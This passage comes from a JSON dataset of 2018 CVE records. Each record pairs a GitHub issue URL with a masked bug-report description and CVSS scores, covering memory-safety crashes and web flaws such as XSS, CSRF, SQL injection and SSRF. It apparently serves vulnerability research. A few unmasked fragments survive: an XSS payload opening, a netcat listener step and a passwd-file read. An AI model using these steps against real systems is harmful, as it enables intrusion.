        "description": "out of bounds read in sf_write_int. version libsndfile: Version released NUMBERTAG description An issue was discovered in libsndfile NUMBERTAG There is an out of bounds read at function sf_write_int, will lead to a denial of service or the others. ERRORTAG debug info In function deinterleave_int, 'ch' is NUMBERTAG leads to the array bounds, and then crash in function sf_write_int . ERRORTAG FILETAG others this bug is reported by pwd MENTIONTAG please send email to EMAILTAG if you have some quetion.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19433",
        "Issue_Url_old": "https://github.com/star7th/showdoc/issues/392",
        "Issue_Url_new": "https://github.com/star7th/showdoc/issues/392",
        "Repo_new": "star7th/showdoc",
        "Issue_Created_At": "2018-11-22T03:48:25Z",
        "description": "There is a XSS. In the FILETAG line NUMBERTAG APITAG APITAG accept the parameter from the APITAG ,then in the line NUMBERTAG APITAG put the parameter directly in the html i reproduce the attack in the docker. after set up the docker, just open the url: URLTAG then: APITAG the source code: FILETAG remove APITAG if you want to reproduce it again",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19469",
        "Issue_Url_old": "https://github.com/woider/ArticleCMS/issues/5",
        "Issue_Url_new": "https://github.com/woider/articlecms/issues/5",
        "Repo_new": "woider/articlecms",
        "Issue_Created_At": "2018-11-22T09:41:27Z",
        "description": "In the modified name XSS attacks with the location of the mailbox. POC\uff1a ERRORTAG location\uff1a ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19517",
        "Issue_Url_old": "https://github.com/sysstat/sysstat/issues/199",
        "Issue_Url_new": "https://github.com/sysstat/sysstat/issues/199",
        "Repo_new": "sysstat/sysstat",
        "Issue_Created_At": "2018-11-23T08:36:20Z",
        "description": "bug report]: out of bound read in sadf which leads to crash.. Version APITAG Description The remap_struct function in APITAG NUMBERTAG has an out of bounds read during a memset call, as demonstrated by sadf. Related APITAG ERRORTAG Additional Information As the debug info shows, the args of memset points to an invalid address. ERRORTAG ASAN ERRORTAG [poc here URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-19530",
        "Issue_Url_old": "https://github.com/httl/httl/issues/225",
        "Issue_Url_new": "https://github.com/httl/httl/issues/225",
        "Repo_new": "httl/httl",
        "Issue_Created_At": "2018-11-19T05:58:57Z",
        "description": "decodexml \u914d\u7f6exstream.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-19531",
        "Issue_Url_old": "https://github.com/httl/httl/issues/224",
        "Issue_Url_new": "https://github.com/httl/httl/issues/224",
        "Repo_new": "httl/httl",
        "Issue_Created_At": "2018-11-19T05:51:53Z",
        "description": "APITAG \u51fd\u6570\u5b58\u5728\u5b89\u5168\u95ee\u9898. APITAG APITAG set(xml2=' APITAG APITAG APITAG APITAG APITAG APITAG calc APITAG APITAG APITAG APITAG APITAG APITAG ') APITAG APITAG APITAG set(xml1=' APITAG APITAG APITAG APITAG NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG false APITAG APITAG NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG start APITAG APITAG APITAG APITAG foo APITAG APITAG APITAG foo APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG false APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG APITAG false APITAG APITAG APITAG false APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG ') APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-19535",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/428",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/428",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2018-09-01T05:40:24Z",
        "description": "APITAG heap buffer overflow at APITAG When running APITAG NUMBERTAG c6f) against png files, , ASAN reports a heap buffer overflow error. POCs: FILETAG FILETAG ASAN output: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19539",
        "Issue_Url_old": "https://github.com/mdadams/jasper/issues/182",
        "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/182",
        "Repo_new": "jasper-software/jasper",
        "Issue_Created_At": "2018-07-13T05:02:09Z",
        "description": "NUMBERTAG bugs found by APITAG (heap buffer overflows, Null pointer dereference and assertion failures). Hi all, These bugs were found with APITAG an input structure aware extension of AFL. Thanks also to Marcel B\u00f6hme, Andrew Santosa and Alexandru Razvan Caciulescu. These bugs were found on Ubuntu NUMBERTAG bit Jasper revision NUMBERTAG a6e4 (HEAD) To reproduce: jasper input APITAG .jp2 input format jp2 output /dev/null output format bmp Bug triggering files are attached. Bug NUMBERTAG Heap Buffer Overflow Read of size NUMBERTAG APITAG ASAN says: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG e9c8 at pc NUMBERTAG f NUMBERTAG adebb NUMBERTAG bp NUMBERTAG ffefa1c9e NUMBERTAG sp NUMBERTAG ffefa1c9e NUMBERTAG READ of size NUMBERTAG at NUMBERTAG e9c8 thread T NUMBERTAG f NUMBERTAG adebb NUMBERTAG in jas_image_depalettize PATHTAG NUMBERTAG f NUMBERTAG ae0e0ee in jp2_decode PATHTAG NUMBERTAG f NUMBERTAG ade NUMBERTAG c in jas_image_decode PATHTAG NUMBERTAG c in main PATHTAG NUMBERTAG f NUMBERTAG aa NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG e9c8 is located NUMBERTAG bytes to the left of NUMBERTAG byte region FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19548",
        "Issue_Url_old": "https://github.com/EduSec/EduSec/issues/14",
        "Issue_Url_new": "https://github.com/edusec/edusec/issues/14",
        "Repo_new": "EduSec/EduSec",
        "Issue_Created_At": "2018-11-23T07:13:38Z",
        "description": "User login security issues. Login interface APITAG APITAG can use a password mechanism that does not prevent brute force cracking, and can use brute force cracking tools to iterate over user names and passwords. Methods: burpsuite pro was used to grab the login packet of the user and then send it to the intruder function to violently guess the user name and password. FILETAG FILETAG FILETAG Solution: you can use a captcha mechanism, or you can use an account or limit the number of times an account name and password error can be checked",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-19557",
        "Issue_Url_old": "https://github.com/assnr/arcms/issues/1",
        "Issue_Url_new": "https://github.com/assnr/arcms/issues/1",
        "Repo_new": "assnr/arcms",
        "Issue_Created_At": "2018-11-23T07:37:34Z",
        "description": "APITAG Access and SQL Injection. Hello,when I browse the code of arcms,I surprised it didn't set permssion for admin' APITAG can visit the URL below and make some operation on demo website NUMBERTAG URLTAG NUMBERTAG URLTAG NUMBERTAG URLTAG NUMBERTAG etc Then,I found a SQL injection in PATHTAG ERRORTAG Look at FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-19559",
        "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/5",
        "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/5",
        "Repo_new": "cuppacms/cuppacms",
        "Issue_Created_At": "2018-11-08T09:18:03Z",
        "description": "APITAG has SQL injection vulnerability. Affected software: APITAG Type of vulnerability: SQL injection Discovered by: darkrerror SQL Injection in PATHTAG with parameter reference_id function APITAG if(! APITAG FILETAG sqlmap tool screenshot FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-19560",
        "Issue_Url_old": "https://github.com/bagesoft/bagecms/issues/4",
        "Issue_Url_new": "https://github.com/bagesoft/bagecms/issues/4",
        "Repo_new": "bagesoft/bagecms",
        "Issue_Created_At": "2018-11-09T02:02:41Z",
        "description": "There is a CSRF vulnerability that can be used to modify administrator accounts to get system privileges.. When the administrator lands, open it. APITAG APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19561",
        "Issue_Url_old": "https://github.com/chenfeizhou/sikcms-v1.1/issues/1",
        "Issue_Url_new": "https://github.com/chenfeizhou/sikcms-v1.1/issues/1",
        "Repo_new": "chenfeizhou/sikcms-v1.1",
        "Issue_Created_At": "2018-11-09T09:18:42Z",
        "description": "CSRF vulnerability can be added to administrator account.. When the administrator lands, open it. APITAG APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19599",
        "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/467",
        "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/467",
        "Repo_new": "monstra-cms/monstra",
        "Issue_Created_At": "2020-05-25T03:57:37Z",
        "description": "Cross Site Scripting Vulnerability on APITAG upload file SVG in Monstra NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature. Monstra application allows the upload of a SVG file extension (which is also an image type). Reproduce Steps to reproduce the behavior NUMBERTAG Login into the panel Monstra NUMBERTAG Go to PATHTAG NUMBERTAG Upload file APITAG APITAG NUMBERTAG Open file upload : PATHTAG NUMBERTAG iew the preview to trigger XSS NUMBERTAG iew the preview to get in request and such Stored XSS. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG Desktop (please complete the following information): OS: Kali Browser: Firefox Version of Browser NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-19600",
        "Issue_Url_old": "https://github.com/rhymix/rhymix/issues/1088",
        "Issue_Url_new": "https://github.com/rhymix/rhymix/issues/1088",
        "Repo_new": "rhymix/rhymix",
        "Issue_Created_At": "2018-09-16T08:51:31Z",
        "description": "XSS via SVG file upload in Rhymix CMS NUMBERTAG Affected software: Rhymix CMS NUMBERTAG Type of vulnerability: XSS via SVG file upload. Description: Rhymix CMS is prone to a Persistent Cross Site Scripting attack that allows a malicious user to inject HTML or scripts that can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. Remediation: Your script should properly sanitize user input. URLTAG Here is the crafted code for XSS. save this code as SVG file i.e. APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Steps to reproduce the vulnerability NUMBERTAG login site as admin NUMBERTAG Open URL URLTAG NUMBERTAG Upload SVG file with crafted XSS code APITAG image APITAG FILETAG NUMBERTAG Open uploaded the file to execute XSS payload APITAG image APITAG FILETAG Discovered by: Provensec Website: FILETAG Author: Subodh Kumar",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-19601",
        "Issue_Url_old": "https://github.com/rhymix/rhymix/issues/1089",
        "Issue_Url_new": "https://github.com/rhymix/rhymix/issues/1089",
        "Repo_new": "rhymix/rhymix",
        "Issue_Created_At": "2018-09-16T08:56:44Z",
        "description": "SSRF via SVG file upload in Rhymix CMS NUMBERTAG Affected software: Rhymix CMS NUMBERTAG Type of vulnerability: SSRF via SVG file upload. Description: Discovered by: Provensec Website: FILETAG Author: Subodh Kumar Description: SSRF as in Server Side Request Forgery is a vulnerability that allows an attacker to force server interfaces into sending packets initiated by the victim server to the local interface or to another server behind the firewall. Consult Web References for more information about this problem. Impact on the server: Abuse the trust relationship between the vulnerable server and others. Bypass IP whitelisting. Bypass host based authentication services. Read resources which are not accessible to the public, such as trace.axd in ASP.NET or metadata APIs in an AWS environment. Scan the internal network to which the server is connected to. Read files from the web server. View Status Pages and interact with APIs as the web server. Retrieve sensitive information such as the IP address of a web server behind a reverse proxy. Remediation: Your script should properly sanitize user input. URLTAG Here is the crafted code for SSRF. Save this code as .svg file i.e. SSRF.svg APITAG APITAG APITAG APITAG Steps to reproduce the vulnerability NUMBERTAG login site as admin NUMBERTAG Open URL URLTAG NUMBERTAG Upload SVG file with crafted SSRF code APITAG image APITAG FILETAG NUMBERTAG Start netcat listener using the command \"nc nvlp NUMBERTAG APITAG image APITAG FILETAG NUMBERTAG Open uploaded the file NUMBERTAG Check netcat listener APITAG image APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 6.0,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-19607",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/561",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/561",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2018-11-23T14:14:35Z",
        "description": "SEGV in APITAG at APITAG Tested in ubuntu NUMBERTAG bit, exi NUMBERTAG master dee NUMBERTAG a NUMBERTAG RC2) APITAG POC file URLTAG gdb info: ERRORTAG ASAN info: ERRORTAG Addition: This bug was found with mem AFL, which is based on AFL. Mem AFL is developed by Yanhao( EMAILTAG ) & Marsman NUMBERTAG EMAILTAG )",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19620",
        "Issue_Url_old": "https://github.com/star7th/showdoc/issues/397",
        "Issue_Url_new": "https://github.com/star7th/showdoc/issues/397",
        "Repo_new": "star7th/showdoc",
        "Issue_Created_At": "2018-11-28T01:21:42Z",
        "description": "Incorrect Access Control. Hello, A bug in the project. I think I should connect you through you APITAG check you gmail later, Thank you.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19661",
        "Issue_Url_old": "https://github.com/erikd/libsndfile/issues/429",
        "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/429",
        "Repo_new": "libsndfile/libsndfile",
        "Issue_Created_At": "2018-11-27T08:57:34Z",
        "description": "global buffer overflow in the function i2alaw_array and i2ulaw_array. version x] libsndfile: Version released NUMBERTAG libsndfile NUMBERTAG pre1. description An issue was discovered in libsndfile NUMBERTAG There is a global buffer overflow at the function i2alaw_array and i2ulaw_array, will lead to a denial of service or the others. similar this [issue URLTAG but occur at the function i2alaw_array and i2ulaw_array . target APITAG ASAN report ERRORTAG and ERRORTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19664",
        "Issue_Url_old": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/305",
        "Issue_Url_new": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/305",
        "Repo_new": "libjpeg-turbo/libjpeg-turbo",
        "Issue_Created_At": "2018-11-27T07:35:12Z",
        "description": "heap buffer overflow in function put_pixel_rows in APITAG ERRORTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19692",
        "Issue_Url_old": "https://github.com/fmsdwifull/tp5cms/issues/5",
        "Issue_Url_new": "https://github.com/fmsdwifull/tp5cms/issues/5",
        "Repo_new": "fmsdwifull/tp5cms",
        "Issue_Created_At": "2018-11-29T09:39:55Z",
        "description": "tp5cms In the photo upload function position can upload any type of document. tp5cms In the photo upload function position can upload any type of document (including PHP) In the location of the upload pictures, the type of the image replacement for other types payload\uff1a ERRORTAG Return \uff1a CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-19693",
        "Issue_Url_old": "https://github.com/fmsdwifull/tp5cms/issues/6",
        "Issue_Url_new": "https://github.com/fmsdwifull/tp5cms/issues/6",
        "Repo_new": "fmsdwifull/tp5cms",
        "Issue_Created_At": "2018-11-29T10:05:25Z",
        "description": "System setting position exists an XSS vulnerability. System setting position exists an XSS vulnerability poc\uff1a ERRORTAG location: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19749",
        "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/81",
        "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/81",
        "Repo_new": "domainmod/domainmod",
        "Issue_Created_At": "2018-11-23T09:37:23Z",
        "description": "Stored XSS vulnerability in Account Owners (owner name). Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: FILETAG Steps NUMBERTAG goto vulnerable endpoint NUMBERTAG At the place of owner name put xss payload \"> APITAG POC attached",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-19750",
        "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/82",
        "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/82",
        "Repo_new": "domainmod/domainmod",
        "Issue_Created_At": "2018-11-23T10:20:29Z",
        "description": "Stored XSS vulnerability in Custom Domain Fields. Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: URLTAG Steps: goto vulnerable endpoint At the place of Display Name, Description, notes put xss payload \"> APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-19752",
        "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/84",
        "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/84",
        "Repo_new": "domainmod/domainmod",
        "Issue_Created_At": "2018-11-23T10:47:19Z",
        "description": "Cross Site Scripting APITAG XSS) vulnerability in PATHTAG Stored XSS vulnerability in Version NUMBERTAG which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: FILETAG Steps: Goto vulnerable endpoint At the place of Display Name, Description, notes put xss payload \"> APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-19784",
        "Issue_Url_old": "https://github.com/Athlon1600/php-proxy-app/issues/139",
        "Issue_Url_new": "https://github.com/athlon1600/php-proxy-app/issues/139",
        "Repo_new": "athlon1600/php-proxy-app",
        "Issue_Created_At": "2018-11-30T03:09:48Z",
        "description": "PHP Proxy APITAG APITAG Detailed steps and sample payload\uff1a URLTAG We suggest that the encryption rules should be strengthened because the logic of decryption is too easy.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-19791",
        "Issue_Url_old": "https://github.com/litespeedtech/openlitespeed/issues/117",
        "Issue_Url_new": "https://github.com/litespeedtech/openlitespeed/issues/117",
        "Repo_new": "litespeedtech/openlitespeed",
        "Issue_Created_At": "2018-11-28T11:30:15Z",
        "description": "Vulnerabilities in Openlitespeed web server. These are vulnerabilities that were discoverd during the APITAG source code for vulnerabilities\" workshop at Hack In The Box Dubai NUMBERTAG Denial of Service =================== The openlitespeed server does not correctly handle requests for byte sequences allowing an attacker to amplify the response size by requesting the entire response body repeatedly. The following curl request illustrates this issue: CODETAG Multiple buffer overflow APITAG There are a number of buffer overflows in the web server source code. While many require administrative access to alter configuration to trigger, the following example can be triggered by a local user: CODETAG The following proof of concept is offered to illustrate the buffer overflow: CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19793",
        "Issue_Url_old": "https://github.com/iwannay/jiacrontab/issues/28",
        "Issue_Url_new": "https://github.com/iwannay/jiacrontab/issues/28",
        "Repo_new": "iwannay/jiacrontab",
        "Issue_Created_At": "2018-12-02T07:05:32Z",
        "description": "Jiacrontab NUMBERTAG arbitrary code execution vulnerability. Test in the demo: FILETAG User: admin Password NUMBERTAG APITAG in APITAG task FILETAG Modify the values of command and args, Read the passwd file. > PATHTAG CODETAG NUMBERTAG Successfully added and run this task FILETAG APITAG NUMBERTAG Get echo FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-19797",
        "Issue_Url_old": "https://github.com/sass/libsass/issues/2779",
        "Issue_Url_new": "https://github.com/sass/libsass/issues/2779",
        "Repo_new": "sass/libsass",
        "Issue_Created_At": "2018-12-01T14:15:32Z",
        "description": "Crash in APITAG function in version NUMBERTAG and latest. I found a crash by fuzzing libsass&sassc. It can be reproduced both in version NUMBERTAG and the master branch (accessed on PATHTAG ) code. Run sassc (built with APITAG with a special file sass_id NUMBERTAG URLTAG APITAG The outputs are as follows: ERRORTAG I found the cause is that in the APITAG function in ast.cpp (the function was moved to ast_selectors.cpp several days ago), the APITAG variable is NULL when coming to the crashing line (noted below). Adding a null check on APITAG indeed could fix the problem but not sure whether there are better ways. ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19826",
        "Issue_Url_old": "https://github.com/sass/libsass/issues/2781",
        "Issue_Url_new": "https://github.com/sass/libsass/issues/2781",
        "Repo_new": "sass/libsass",
        "Issue_Created_At": "2018-12-03T07:37:21Z",
        "description": "Out of Memory (crash) with malformed input files APITAG an extra '/' or '&'). Some malformed input could cause the libsass/sassc program out of memory and crashes. These malformed files are not big and are simply adding an extra '/' or '&' in original files (created by fuzzing). The problem can be reproduced both in version NUMBERTAG and the master branch (accessed on PATHTAG ) code. Sample malformed input files include URLTAG and URLTAG . Run APITAG sass_mem NUMBERTAG For example, sass_mem NUMBERTAG looks like below, where the ' & ' symbol before NUMBERTAG is extra: APITAG APITAG the sass_mem NUMBERTAG file, the '/' is added later URLTAG Call stack Since the problem will crash so when I randomly stop the problem, the call stacks looks like below: CODETAG Where in APITAG ) at APITAG the APITAG line the s becomes a very long string ( APITAG ) and is keeping increasing. Seems the problem enters some endless loop . The memory footprint of the program grows quickly (to NUMBERTAG GB and above) and later the problem is killed by the system.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19827",
        "Issue_Url_old": "https://github.com/sass/libsass/issues/2782",
        "Issue_Url_new": "https://github.com/sass/libsass/issues/2782",
        "Repo_new": "sass/libsass",
        "Issue_Created_At": "2018-12-03T12:05:02Z",
        "description": "APITAG heap use after free in both libsass NUMBERTAG and latest codebase. I found a new heap use after free bug with a special sass file. The file causes heap use after free bug in both version NUMBERTAG and the latest master branch (accessed on PATHTAG ) codebase, though with slightly different crash stacks. APITAG is quite different from previous issue URLTAG .) Build libsass/saasc with APITAG APITAG Run APITAG (sass_heap_UAF is at here: URLTAG The program crashes. APITAG Crash stack Crash in the latest code (accessed on PATHTAG ) ERRORTAG Crash in libsass NUMBERTAG ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19838",
        "Issue_Url_old": "https://github.com/sass/libsass/issues/2660",
        "Issue_Url_new": "https://github.com/sass/libsass/issues/2660",
        "Repo_new": "sass/libsass",
        "Issue_Created_At": "2018-06-02T07:32:14Z",
        "description": "Stack over flow errors at IMPLEMENT_AST_OPERATORS expansion. We found with our fuzzer some stack over flow errors when executing on APITAG expansion inside ast.cpp (exact lines may differ in NUMBERTAG or NUMBERTAG when compiled with different optimizations, APITAG when compiled with Address Sanitizer (using sassc as the driver). ERRORTAG Sample input files: FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19839",
        "Issue_Url_old": "https://github.com/sass/libsass/issues/2657",
        "Issue_Url_new": "https://github.com/sass/libsass/issues/2657",
        "Repo_new": "sass/libsass",
        "Issue_Created_At": "2018-06-02T07:01:37Z",
        "description": "Buffer Overflow against some invalid input. We found with our fuzzer some buffer over flow errors against some invalid inputs. ERRORTAG sample input files: FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-19841",
        "Issue_Url_old": "https://github.com/dbry/WavPack/issues/54",
        "Issue_Url_new": "https://github.com/dbry/wavpack/issues/54",
        "Repo_new": "dbry/wavpack",
        "Issue_Created_At": "2018-11-29T08:01:53Z",
